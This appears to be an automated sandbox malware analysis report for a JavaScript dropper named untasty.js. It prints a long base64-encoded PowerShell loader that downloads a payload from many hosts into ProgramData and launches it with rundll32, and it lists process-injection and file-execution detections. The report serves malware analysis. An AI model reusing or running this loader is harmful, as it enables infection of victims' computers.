GsAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBJAEEAYgB3AEIAeQBBAEcAYwBBAGEAQQBCAHAAQQBGAEkAQQBaAFEAQgBqAEEARwA4AEEAYgBnAEIAbQBBAEcAawBBAGMAdwBCAGoAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGoAQQBHADgAQQBiAGcAQgB6AEEASABVAEEAYgBRAEIAbABBAEcAUQBBAEwAZwBCAG4AQQBHADgAQQBiAEEAQgBrAEEAQQA9AD0AcgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEARwBVAEEAZABBAEIAeQBBAEcARQBBAGQAQQBCAHYAQQBIAEkAQQBlAFEAQgBGAEEASABnAEEAZABBAEIAeQBBAEgAVQBBAGMAdwBCAHAAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWgBRAEIAdQBBAEgAUQBBAFoAUQBCAHkAQQBIAEEAQQBjAGcAQgBwAEEASABNAEEAWgBRAEIAegBBAEEAPQA9AHIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBnAEEAYgB3AEIAdABBAEcAOABBAFoAUQBCAHkAQQBHADgAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAeQBBAEcAVQBBAGQAZwBCAHAAQQBHAFUAQQBkAHcAQQA9ACIAOwAkAGEAcABvAHMAdAByAG8AcABoAGkAegBlAGQAQwBvAG0AcABsAGUAeABpAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEgASQBBAGIAdwBCAHcAQQBIAEkAQQBhAFEAQgBsAEEASABRAEEAWQBRAEIAeQBBAEcAawBBAFoAUQBCAHoAQQBGAE0AQQBjAFEAQgAxAEEARwBFAEEAYgBRAEIAbABBAEcAdwBBAGIAQQBCAGgAQQBIAFEAQQBaAFEAQQB1AEEARwBjAEEAYgB3AEIAcwBBAEcAWQBBAEIATgBVAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBRAEEAdQBBAEQARQBBAE4AZwBBAHoAQQBDADQAQQBNAGcAQQB4AEEARABFAEEATABnAEEAeABBAEQARQBBAE4AZwBBAD0AIgA7ACQAcABlAHIAagB1AHIAZQBkAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEUAQQBNAHcAQQB4AEEAQwA0AEEATwBBAEEAMABBAEMANABBAE0AUQBBADMAQQBEAEEAQQAiADsAJABUAG8AbwBtAGwAeQBNAGUAYwBoAGEAbgBvAHIAZQBjAGUAcAB0AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGIAdwBCAHQAQQBHAGsAQQBkAEEAQgBoAEEARwBRAEEAYQBnAEIAcABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgBqAEEASABVAEEAYgBBAEIAMABBAEgAVQBBAGMAZwBCAGgAQQBHAHcAQQBMAGcAQgBoAEEARwBNAEEAWQBRAEIAawBBAEcAVQBBAGIAUQBCADUAQQBBAD0APQB2AG0AYwBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEATABnAEEAeQBBAEQAUQBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQB4AEEAQQA9AD0AdgBtAGMATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBPAEEAQQB1AEEARABVAEEATgBRAEEAdQBBAEQARQBBAE8AQQBBADQAQQBDADQAQQBOAHcAQQA0AEEAQQA9AD0AdgBtAGMATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBRAEIAWABBAEcAOABBAGMAZwBCAGsAQQBHAEkAQQBkAFEAQgBwAEEARwB3AEEAWgBBAEIAcABBAEcANABBAFoAdwBBAHUAQQBIAEkAQQBkAFEAQgBvAEEASABJAEEAIgA7ACQAdAByAGkAYwBrAGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATgBnAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA0AEEARABVAEEATABnAEEAMwBBAEQASQBBAEwAdwBCAHoAQQBEAEUAQQBlAEEAQgB1AEEAQwA4AEEAWgBnAEEAegBBAEUAawBBAHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQAawBBAE8AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATgBBAEEANABBAEMAOABBAGIAZwBCAEkAQQBDADgAQQBSAFEAQgBRAEEAQQA9AD0AdQBKAGkAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBPAFEAQQB5AEEAQwA4AEEAUwBnAEIAVQBBAEcAawBBAEwAdwBCAHAAQQBGAG8AQQBkAHcAQgBVAEEARQBZAEEAYwBBAEIAVwBBAEgAQQBBAFIAdwBBAHkAQQBEAEEAQQBWAEEAQQA9AHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEgAawBBAGEAQQBCAHgAQQBGAGMAQQBOAHcAQgBqAEEARQBZAEEAUQBRAEIASABBAEQAawBBAHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATgBnAEEANABBAEMAOABBAE8AUQBCAEQAQQBHADAAQQBPAFEAQgBGAEEARgBjAEEATAB3AEIARgBBAEcAdwBBAFEAdwBCAHMAQQBHAHcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABuAG8AbgBlAHgAdABlAG4AcwBpAHYAZQAgAGkAbgAgACQAdAByAGkAYwBrAGwAZQBkACAALQBzAHAAbABpAHQAIAAiAHUASgBpAGEAIgApACAAewAkAGMAbwBwAGgAbwB1AHMAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAHQAQQBHADgAQQBjAGcAQgBrAEEARQA0AEEAYgB3AEIAdQBBAEcAVQBBAGUAQQBCADAAQQBHAFUAQQBjAGcAQgB0AEEARwBrAEEAYgBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAPQBEAHEAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBZAFEAQgBrAEEARwB3AEEAYQBRAEIAbgBBAEcAZwBBAGQAQQBCAEMAQQBIAFUAQQBiAEEAQgBzAEEARwBnAEEAWgBRAEIAaABBAEcAUQBBAFoAUQBCAGsAQQBHAHcAQQBlAFEAQQB1AEEASABJAEEAWgBRAEIAawBBAEEAPQA9AEQAcQBYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAZwBBAGMAZwBCAHYAQQBHADAAQQBZAFEAQgAwAEEARwA4AEEAYwBBAEIAbwBBAEcAOABBAGMAZwBCAHYAQQBIAFUAQQBjAHcAQQB1AEEASABZAEEAWgBRAEIAdQBBAEgAUQBBAGQAUQBCAHkAQQBHAFUAQQBjAHcAQQA9ACIAOwAkAG4AbwBuAGMAbwBuAHYAZQByAHQAaQBiAGwAZQBuAGUAcwBzAEYAaQBkAGkAYwBpAG4AYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEARwA4AEEAYQBRAEIAcwBBAEcAVQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEARgBBAEEAYwBnAEIAbABBAEcATQBBAFkAUQBCAHUAQQBHAE0AQQBaAFEAQgB5AEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEEAPQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AQQBBADEAQQBDADQAQQBOAHcAQQAyAEEAQwA0AEEATgB3AEEAMQBBAEMANABBAE8AQQBBAHcAQQBBAD0APQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE0AQQBBAHUAQQBEAEUAQQBNAGcAQQAxAEEAQwA0AEEATQBnAEEAeQBBAEQARQBBAEwAZwBBADIAQQBEAE0AQQAiADsAJAB1AG4AbQBlAGEAbgB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEgATQBBAGEAUQBCAGgAQQBHADQAQQBhAFEAQgBqAEEARQBnAEEAYgB3AEIAdgBBAEgASQBBAFkAUQBCAG8AQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAWgBBAEIAcABBAEgASQBBAFoAUQBCAGoAQQBIAFEAQQBiAHcAQgB5AEEASABrAEEAZwB3AGkAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGoAQQBIAFUAQQBjAGcAQgBqAEEASABVAEEAYgBBAEIAcABBAEcAOABBAGMAdwBCAEIAQQBHAGMAQQBZAFEAQgB5AEEARwBrAEEAWQB3AEEAdQBBAEcAcwBBAGEAUQBCADAAQQBHAE0AQQBhAEEAQgBsAEEARwA0AEEAZwB3AGkAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFUAQQBZAHcAQgBqAEEARwB3AEEAWgBRAEIAegBBAEcAawBBAGIAdwBCAHMAQQBHADgAQQBaAHcAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEMANABBAGIAUQBCADQAQQBBAD0APQBnAHcAaQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGEAUQBCAHMAQQBHAEUAQQBhAHcAQgBoAEEAQwA0AEEAYgBRAEIAbABBAEcANABBACIAOwB0AHIAeQAgAHsAJABTAHQAZQBtAHMAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAZQBRAEIAbABBAEcAdwBBAGEAUQBCAHUAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAMABBAEcAawBBAFkAdwBCAFYAQQBHADQAQQBZAFEAQgBuAEEASABJAEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBDADQAQQBZAGcAQgBsAEEASABRAEEAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAeQBBAEMANABBAE0AUQBBAHcAQQBEAGsAQQBMAGcAQQB4AEEARABJAEEATgB3AEEAPQBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEgASQBBAGQAUQBCAGsAQQBHAGMAQQBhAFEAQgB1AEEARwBjAEEAVgBRAEIAdQBBAEcAVQBBAGIAZwBCADEAQQBHADAAQQBaAFEAQgB5AEEARwBFAEEAZABBAEIAcABBAEgAWQBBAFoAUQBBAHUAQQBHAG8AQQBjAEEAQQA9AHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBZAEEAYQBRAEIAaABBAEcAUQBBAGQAUQBCAGoAQQBIAFEAQQBjAHcAQQB1AEEASABRAEEAYgB3AEIAMQBBAEgASQBBAGMAdwBBAD0AIgA7ACQAVAB1AHIAdABvAHMAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGIAdwBCADAAQQBHAGcAQQBaAFEAQgB2AEEASABJAEEAYQBRAEIAegBBAEgAUQBBAEwAZwBCAGoAQQBHADgAQQBTAGgARgBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYgBBAEIAbABBAEUATQBBAGIAdwBCAGgAQQBHAFEAQQBhAGcAQgAxAEEASABRAEEAWQBRAEIAdQBBAEgAUQBBAEwAZwBCAGkAQQBHAEUAQQBjAGcAQgBuAEEARwBFAEEAYQBRAEIAdQBBAEgATQBBAFMAaABGAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATgB3AEEAdQBBAEQAYwBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMQBBAEQAYwBBAFMAaABGAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAYQBRAEIAeQBBAEcANABBAFkAUQBCAHMAQQBGAGMAQQBhAFEAQgB5AEEARwBVAEEAYQBBAEIAaABBAEcAawBBAGMAZwBBAHUAQQBIAFUAQQBhAHcAQQA9ACIAOwAkAFUAbgBhAHQAdAByAGEAYwB0AGkAdgBlAFUAbgBhAHAAcAByAGUAYwBpAGEAdABpAHYAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABuAG8AbgBlAHgAdABlAG4AcwBpAHYAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFUAbgBhAHQAdAByAGEAYwB0AGkAdgBlAFUAbgBhAHAAcAByAGUAYwBpAGEAdABpAHYAZQAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAHAAaQB0AHQAbABlAHMAdABhAGYAZgBIAHkAcABlAHIAcwB1AGIAdABsAGUALgBoAGUAeABhAG0AZQByAG8AdQBzAEkAZABpAG8AdABpAHMAZQA7ACQASABlAG4AbQBvAGwAZAB5AE0AdQBnAGcAaQBuAGcAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGMAdwBCADUAQQBHAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEgAUQBBAGMAZwBCADUAQQBFAFUAQQBZAGcAQgBqAEEARwBFAEEAYwB3AEIAagBBAEMANABBAGQAZwBCAGoAQQBBAD0APQA9AEsASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAGsAQQBMAGcAQQAyAEEARABNAEEATABnAEEANQBBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBNAEEAQQA9ACIAOwAkAGgAbwBvAGQAdwBpAG4AawBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAE0AQQBMAGcAQQB4AEEARABNAEEATQBRAEEAPQBFAHoAVwB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAMwBBAEQARQBBAEwAZwBBADUAQQBEAEkAQQAiADsAJABCAGEAegBhAGEAcgBOAG8AbgBlAHgAYQBnAGcAZQByAGEAdABpAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcANABBAGIAdwBCAHUAQQBIAEkAQQBZAFEAQgBrAEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBHADAAQQBaAFEAQQA9AGIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQA0AEEARABFAEEATABnAEEAeQBBAEQAUQBBAE0AZwBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAGkAdAB0AGwAZQBzAHQAYQBmAGYASAB5AHAAZQByAHMAdQBiAHQAbABlAC4AaABlAHgAYQBtAGUAcgBvAHUAcwBJAGQAaQBvAHQAaQBzAGUAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADYAMgA3ADAAOQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEgATQBBAGMAQQBCAHAAQQBIAFEAQQBkAEEAQgBzAEEARwBVAEEAYwB3AEIAMABBAEcARQBBAFoAZwBCAG0AQQBFAGcAQQBlAFEAQgB3AEEARwBVAEEAYwBnAEIAegBBAEgAVQBBAFkAZwBCADAAQQBHAHcAQQBaAFEAQQB1AEEARwBnAEEAWgBRAEIANABBAEcARQBBAGIAUQBCAGwAQQBIAEkAQQBiAHcAQgAxAEEASABNAEEAUwBRAEIAawBBAEcAawBBAGIAdwBCADAAQQBHAGsAQQBjAHcAQgBsAEEAQwB3AEEAZABnAEIAcABBAEgAQQBBAGMAdwBBADcAQQBFADAAQQBTAFEAQgBVAEEARQB3AEEAYQBRAEIAagBBAEcAVQBBAGIAZwBCAHoAQQBHAFUAQQAiADsAJABDAG8AbQBiAGUAcgBzAFcAYQByAGQAZQBuAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcARQBBAGQAQQBCAGwAQQBIAGMAQQBZAFEAQgA1AEEARwAwAEEAWQBRAEIAdQBBAEUAUQBBAFoAUQBCAGgAQQBHAFkAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAdQBBAEgAUQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQA9AGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBzAEEAWgBRAEIAMABBAEcAOABBAFoAdwBCAGwAQQBHADQAQQBSAFEAQgB0AEEARwA4AEEAWgBBAEIAcABBAEcANABBAGMAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBnAEEAIgA7ACQAYwBhAHIAYQBiAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcAawBBAGIAUQBCAGgAQQBHADQAQQBkAEEAQgB2AEEASABBAEEAZABRAEIAegBBAEYAUQBBAGIAdwBCAHkAQQBIAEkAQQBaAFEAQgBtAEEASABrAEEATABnAEIAdABBAEcAOABBAFoAQQBCAGgAQQBBAD0APQB4AGgASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFcAQQBHAGsAQQBjAHcAQgBqAEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCADAAQQBHADgAQQBjAGcAQQB1AEEARwA0AEEAWQBRAEIAMgBBAEgAawBBAHgAaABLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAWQBBAEwAZwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABFAEEATwBRAEEAdwBBAEMANABBAE0AZwBBAHgAQQBEAFEAQQB4AGgASwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGcAQQBlAFEAQgB3AEEARwBVAEEAYwBnAEIAdwBBAEgASQBBAGIAdwBCAHcAQQBHAGcAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEcAMABBAFkAUQBCAHUAQQBHAEUAQQBaAHcAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBACIAOwAkAFMAeQBuAGEAbgBnAGkAYQBsAEMAbwByAGIAZQBsAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGsAQQBNAFEAQQB1AEEARABnAEEATQBnAEEAdQBBAEQASQBBAE0AZwBBADEAQQBBAD0APQBLAEQAYQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFkAQQBaAFEAQgB5AEEARwBJAEEAWQBRAEIAcwBBAEcAawBBAGMAdwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAUwBBAEIAbABBAEgASQBBAFoAQQBCAGwAQQBIAEkAQQBjAHcAQQB1AEEARwB3AEEAYQBRAEIAdABBAEcAawBBAGQAQQBCAGwAQQBHAFEAQQBLAEQAYQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBsAEEARwA0AEEAZABRAEIAdABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgBrAEEAQwA0AEEAYQB3AEIAcABBAEgAUQBBAFkAdwBCAG8AQQBHAFUAQQBiAGcAQQA9AEsARABhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AZwBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBRAEEAeABBAEQARQBBAEwAZwBBADAAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewAkAEwAdQBuAGMAaABlAG8AbgBlAHQAdABlAHMATQBlAG4AdABoAGEAYwBlAGEAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAUQBBAGMAZwBCADEAQQBHAFEAQQBaAHcAQgBwAEEARwA0AEEAWgB3AEIAVgBBAEcANABBAFoAUQBCAHUAQQBIAFUAQQBiAFEAQgBsAEEASABJAEEAWQBRAEIAMABBAEcAawBBAGQAZwBCAGwAQQBDADQAQQBjAGcAQgB2AEEARwBNAEEAYQB3AEIAegBBAEEAPQA9ACIAOwAkAGgAZQBuAGMAaABtAGUAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQA9AEYAVwBNAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATwBRAEEAdQBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB4AEEARABVAEEATABnAEEAeQBBAEQAUQBBAE8AUQBBAD0ARgBXAE0AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEIAQQBIAE0AQQBkAHcAQgBoAEEARwBrAEEAYgBBAEIAVABBAEgAVQBBAFkAZwBCAGgAQQBIAFUAQQBaAEEAQQB1AEEARwB3AEEAYQBRAEIAdABBAEcAOABBACIAOwB9AH0AJABpAGcAbgBhAHQAaQB1AHMARgBsAHUAdABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBPAFEAQQB1AEEARABnAEEATgB3AEEAdQBBAEQARQBBAE4AUQBBADQAQQBDADQAQQBPAEEAQQA1AEEAQQA9AD0AdwBDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcATQBBAGMAZwBCAHYAQQBHAEkAQQBhAFEAQgB6AEEAQwA0AEEAYgBRAEIAaQBBAEcARQBBACIAOwA="

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2536 resumed a thread in remote process 2716
Process injection	Process 2716 resumed a thread in remote process 2828
NtResumeThread May 24, 2023, 11:04 a.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2716	1	0	0
NtResumeThread May 24, 2023, 11:04 a.m.	thread_handle: 0x000002fc suspend_count: 1 process_identifier: 2828	1	0	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

untasty.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All